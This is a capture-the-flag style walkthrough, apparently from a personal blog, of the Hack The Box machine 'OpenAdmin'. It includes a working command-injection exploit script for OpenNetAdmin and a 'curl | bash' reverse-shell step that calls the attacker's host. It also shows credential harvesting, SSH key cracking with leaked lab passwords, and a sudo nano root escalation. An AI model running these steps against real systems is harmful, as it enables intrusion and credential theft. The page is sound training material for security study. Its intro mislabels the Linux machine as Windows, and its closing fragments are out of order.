🖥️
Cybersecurity
  • 👋Welcome Page
    • About Me
  • 🗒️Progress List
  • ⌨️Cybersecurity
    • Tip & Tricks
      • Add Host
      • Bash Upgrade
      • Custom Function
      • Docker Container
      • Nuclei
  • 🖥️Hack The Box
    • Linux Machine
      • Easy Machine
        • Shocker
    • Windows Machine
      • Easy Machine
        • Active
    • Old Machines
      • Easy Machine
        • Academy
        • Bashed
        • Bastion
        • Cap
        • Explore
        • Forest
        • Friendzone
        • Haystack
        • Help
        • Irked
        • Lame
        • Mirai
        • Networked
        • OpenAdmin
        • Photobomb
        • Precious
        • MonitorsTwo
        • Sau
        • Topology
      • Medium Machine
        • Aragog
        • Bitlab
        • Canape
        • DevOops
        • Forgot
        • Jarvis
        • Lightweight
        • Magic
        • Tenten
      • Hard Machine
        • Spider
        • Zipper
    • Current Season
      • Headless
      • Perfection
  • 📙BurpSuite Labs
    • 🔬Laboratories
      • Code Template Page
      • HTTP Host Header Attacks
Powered by GitBook
On this page
  • Gather Information
  • Weaponization and Exploitation
  • Privileges Scalation
  1. Hack The Box
  2. Old Machines
  3. Easy Machine

OpenAdmin

#Windows #Enumeration #Web-Exploitation

PreviousNetworkedNextPhotobomb

Last updated 8 months ago

OpenAdmin is an easy-rated Windows machine from created by del_KZx497Ju. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.214.71.

This machine is straightforward once you find the Admin login page. It features an outdated OpenNetAdmin CMS. From here, you can move to enter the machine as a low privileged user, then jump to a second user by using its credentials located at a local application, then escalate by a sudo misconfiguration with nano.

Gather Information

Before doing anything, always start using ping to see if this is working

Local Terminal
ping -c 1 10.129.214.71
Local Terminal
nmap -p- --open -T5 -v -n 10.129.214.71
Local Terminal
nmap -sC -sV -p 22,80 10.129.214.71
Local Terminal
whatweb http://10.129.214.71

Right now the best option is to explore the website content.

  • Browser: http://10.129.214.71

Definitively is just an Ubuntu Default Page, nothing special, unless you press CTRL+U

At this moment, we don’t have any important information, our best option is to search for resources. So we are going to use Wfuzz in colorized format (-c) with 200 threats (-t 200) using a dictionary (-w), while hiding the response status 404 (--hc=404), add try at FUZZ

Local Terminal
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.219.214.71/FUZZ

Ok, there are three payloads that make sense, let’s try with “artwork”, then “music”, and “sierra”

  • Browser: http://10.129.214.71/artwork/

  • Browser: http://10.129.214.71/music

Let’s search if “OpenNetAdmin” have vulnerabilities at the database.

Local Terminal
searchsploit OpenNetAdmin

Weaponization and Exploitation

Exploit.sh
#!/bin/bash

URL="http://10.129.214.71/ona/"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Local Terminal
.\exploit.sh

And now, to improve our terminal, we need to create an html file and oblige the target to read it. Open two terminals, TermA and TermB.

Local Terminal A
vi index.html
python3 -m http.server 80
Local Terminal B
nc -nlvp 443
Target Terminal
curl 10.10.14.76 | bash

Read the file from 10.10.14.76 with bash

Target Terminal
grep -r -i -E "user|pass|key|database"
cd /home/
find \-name user.txt 2>/dev/null   #Nothing, there is a permission issue
find \-name user.txt

Now we need to hunt for their passwords to login

Target Terminal
cd /opt/ona/www
find \-type f 2>/dev/null | grep "config"
Target Terminal
cat ./local/config/database_settings.inc.php
Target Terminal
grep "sh$" /etc/passwd

We have a password, so now we can test that with every user

Target Terminal
su jimmy
Target Terminal - Jimmy
cd /var/www/internal
ls
cat main.php

Ok, now we are going to check the configuration.

Target Terminal - Jimmy
ls /etc/apache2/sites-available/
cat /etc/apache2/sites-available/internal.conf

There is something in that port, let’s try a curl to prove is exist, if this exist, by using that location we will be able to execute commands as the user “Joanna” and execute main.php

Target Terminal - Jimmy
curl localhost:52846/reverseShell.php

Is nice to know that, but previously we see that in main.php, we can call the RSA Private Key of the user Joanna, is an easier way.

Target Terminal - Jimmy
curl localhost:52846/main.php

Paste the content in a file in your local machine and open a Terminal.

Local Terminal
vi id_rsa			#paste the key inside
chmod 600 id_rsa
ssh -i id_rsa joanna@10.129.214.71
Local Terminal
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash  #password: bloodninjas
ssh -i id_rsa joanna@10.129.214.71
Target Terminal - Joanna
ls
cat user.txt

Privileges Scalation

Target Terminal - Joanna
cd /root/		#you can't enter
id			#To see the groups
sudo -l

As you can see, we can execute the command nano to the file /opt/priv without passwords. This means that we can execute commands inside that file without requiring a password

Target Terminal - Joanna
sudo -u root nano /opt/priv
#CTRL+R for read files, then CTRL+X to execute commands

It works, this is a nice chance to give admin permission as root to the /bin/bash file for every user.

Target Terminal - Joanna
bash -p
Target Root
cat root.txt

Look, there is a bash script for the version 18.1.1, this means that we can use that exploit. Copy and paste the code from to a file called exploit.sh, and at URL, paste the target ONA URL and run the script.

Now our best option is to do an

But hey, it does not works, this is because the id_rsa is encrypted, you can see that in the second row {Proc-Type: 4, ENCRYPTED}, first we need to download the tool , and decrypt the id_rsa.

🖥️
https://www.exploit-db.com/exploits/47691
tty treatment.
https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py
HackTheBox
Output, the TTL is close to 64 so it is a Linux related machine
Nmap’s output, looks like a simple website.
Confirms the previous statement
Whatweb’s output, There is no domain.
Default page
Still, default information, there is nothing relevant at https://launchpad.net/bugs/1288690
Bugged output from WFuzz, will be fixed in future post.
After exploring the website, I didn’t found anything.
After exploring, there was something only at Login, this looks like a Content Manager
Open Net Admin’s Interface
Part 1 from Searchploit
Part 2 from Searchploit
It works, this bash prompt will be TargetTerminal as user www-data
Content of index.html
We are in, now the TermB is TargetTerminal as www-data
We found something with an interesting name.
Someone’s password: n1nj4W4rri0R!
List of users
It was Jimmy’s password, now your Target Terminal is user Jimmy
There is nothing at Jimmy’s folder
Content of main.php, joanna’s id_rsa.
Content of reverse.Shell.php
Output: Joanna
Copy the RSA
Now your LocalTerm is TargetJoanna
File that can be executed as root using user joanna, in this case: Command nano
Command to execute
Output
Done, and exit with CTRL + X